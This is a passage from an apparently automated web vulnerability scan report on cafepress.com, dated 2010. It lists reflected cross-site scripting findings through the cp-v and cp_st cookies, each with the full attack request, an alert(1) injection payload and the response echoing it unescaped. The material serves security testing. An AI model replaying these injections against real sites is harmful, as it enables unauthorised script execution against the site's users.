__utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 59529
Date: Sun, 26 Dec 2010 13:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cp_sc=201675; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:03 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '4f3e8</script><script>alert(1)</script>edf8d16990b'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.78. http://www.cafepress.com/TheGamingApe [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/TheGamingApe

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"6e0c4f15927 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 49072
Date: Sun, 26 Dec 2010 13:49:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA62888"-alert(1)-"6e0c4f15927";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.79. http://www.cafepress.com/TheGamingApe [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/TheGamingApe

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c582f</script><script>alert(1)</script>2b819df52d1 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c582f</script><script>alert(1)</script>2b819df52d1; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 49112
Date: Sun, 26 Dec 2010 13:49:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook
...[SNIP]...
s = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'PremiumShop'
window.cafepress.tealeaf.searchTerm = 'c582f</script><script>alert(1)</script>2b819df52d1'
window.cafepress.tealeaf.salesChannel = 'Shop'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_08
...[SNIP]...

1.80. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/RedirectWithSEOURL.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10557"-alert(1)-"7c7111c0034 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 75201
Date: Sun, 26 Dec 2010 13:46:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA10557"-alert(1)-"7c7111c0034";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.81. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/RedirectWithSEOURL.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97a3f</script><script>alert(1)</script>4b81aaff511 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=97a3f</script><script>alert(1)</script>4b81aaff511; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 75223
Date: Sun, 26 Dec 2010 13:46:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 75223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HomePage'
window.cafepress.tealeaf.searchTerm = '97a3f</script><script>alert(1)</script>4b81aaff511'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.82. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/addtocarthelper.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 758b2"-alert(1)-"7bb18591cca was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
ntCoent-Length: 41323
Date: Sun, 26 Dec 2010 13:46:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 41323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA758b2"-alert(1)-"7bb18591cca";

